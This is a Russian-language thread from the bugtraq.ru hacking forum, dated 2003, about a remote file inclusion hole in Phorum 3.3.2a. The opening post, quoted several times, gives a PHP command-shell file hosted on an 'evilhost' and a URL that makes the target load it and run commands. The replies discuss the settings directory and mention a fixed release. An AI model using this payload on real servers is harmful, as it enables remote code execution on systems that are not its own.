информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
За кого нас держат?Страшный баг в Windows
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Массовый взлом SharePoint 
 Microsoft Authenticator прекращает... 
 Очередное исследование 19 миллиардов... 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
если вы видите этот текст, отключите в настройках форума использование JavaScript
ФОРУМ
все доски
FAQ
IRC
новые сообщения
site updates
guestbook
beginners
sysadmin
programming
operating systems
theory
web building
software
hardware
networking
law
hacking
gadgets
job
dnet
humor
miscellaneous
scrap
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
Уязвимость Phorum version 3.3.2a 07.02.03 10:24  Число просмотров: 15250
Автор: catlion <catlion> Статус: Member
<"чистая" ссылка>
> Phorum - приложение программного обеспечения форума,
> написанное в php.
> Недостаток защиты в программе позволяет удаленным
> пользователям включать
> внешние php сценарии и выполнять произвольный код и
> команды. Пример: Создаем
> файл replace.php на сайте evilhost:
> <?
> echo("<?
> system(\"\$cmd\");
> ?>");
> ?> Если PHP не поддерживается, то вносим:
> <?
> system("$cmd");
> ?>
> Затем:
>
> http://[target]/phorum/plugin/replace/plugin.php?PHORUM[set
> tings_dir]=http://[evilhost]&cmd=ls
> -----------------------------------------------------------
> -----
> все понятно, но что имеется в виду под settings_dir, я что
> то не вкуриваю...
> может кто подскажет?

/phorum/admin/settings
и кстати в файле install.txt сказано, что ее надо вынести за пределы дерева каталогов сервера (т.е. из htdocs). Уж не знаю, поможет ли:-

И еще, вышел стабильный phorum 3.4.1
<hacking>
Уязвимость Phorum version 3.3.2a 07.02.03 03:36  
Автор: Джон Статус: Незарегистрированный пользователь
<"чистая" ссылка>
Phorum - приложение программного обеспечения форума, написанное в php.
Недостаток защиты в программе позволяет удаленным пользователям включать
внешние php сценарии и выполнять произвольный код и команды. Пример: Создаем
файл replace.php на сайте evilhost:
<?
echo("<?
system(\"\$cmd\");
?>");
?> Если PHP не поддерживается, то вносим:
<?
system("$cmd");
?>
Затем:
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls
----------------------------------------------------------------
все понятно, но что имеется в виду под settings_dir, я что то не вкуриваю...
может кто подскажет?
Уязвимость Phorum version 3.3.2a 07.02.03 10:24  
Автор: catlion <catlion> Статус: Member
<"чистая" ссылка>
> Phorum - приложение программного обеспечения форума,
> написанное в php.
> Недостаток защиты в программе позволяет удаленным
> пользователям включать
> внешние php сценарии и выполнять произвольный код и
> команды. Пример: Создаем
> файл replace.php на сайте evilhost:
> <?
> echo("<?
> system(\"\$cmd\");
> ?>");
> ?> Если PHP не поддерживается, то вносим:
> <?
> system("$cmd");
> ?>
> Затем:
>
> http://[target]/phorum/plugin/replace/plugin.php?PHORUM[set
> tings_dir]=http://[evilhost]&cmd=ls
> -----------------------------------------------------------
> -----
> все понятно, но что имеется в виду под settings_dir, я что
> то не вкуриваю...
> может кто подскажет?

/phorum/admin/settings
и кстати в файле install.txt сказано, что ее надо вынести за пределы дерева каталогов сервера (т.е. из htdocs). Уж не знаю, поможет ли:-

И еще, вышел стабильный phorum 3.4.1
Ребята, этой дыре уже миллионы лет :) 12.02.03 03:00  
Автор: Rara Avis Статус: Незарегистрированный пользователь
<"чистая" ссылка>
> > Phorum - приложение программного обеспечения форума,
> > написанное в php.
> > Недостаток защиты в программе позволяет удаленным
> > пользователям включать
> > внешние php сценарии и выполнять произвольный код и
> > команды. Пример: Создаем
> > файл replace.php на сайте evilhost:
> > <?
> > echo("<?
> > system(\"\$cmd\");
> > ?>");
> > ?> Если PHP не поддерживается, то вносим:
> > <?
> > system("$cmd");
> > ?>
> > Затем:
> >
> >
> http://[target]/phorum/plugin/replace/plugin.php?PHORUM[set
> > tings_dir]=http://[evilhost]&cmd=ls
> >
> -----------------------------------------------------------
> > -----
> > все понятно, но что имеется в виду под settings_dir, я
> что
> > то не вкуриваю...
> > может кто подскажет?
>
> /phorum/admin/settings
> и кстати в файле install.txt сказано, что ее надо вынести
> за пределы дерева каталогов сервера (т.е. из htdocs). Уж не
> знаю, поможет ли:-
>

> И еще, вышел стабильный phorum 3.4.1

РЕБЯТА, этой дыре уже миллионы лет :)
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2025 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach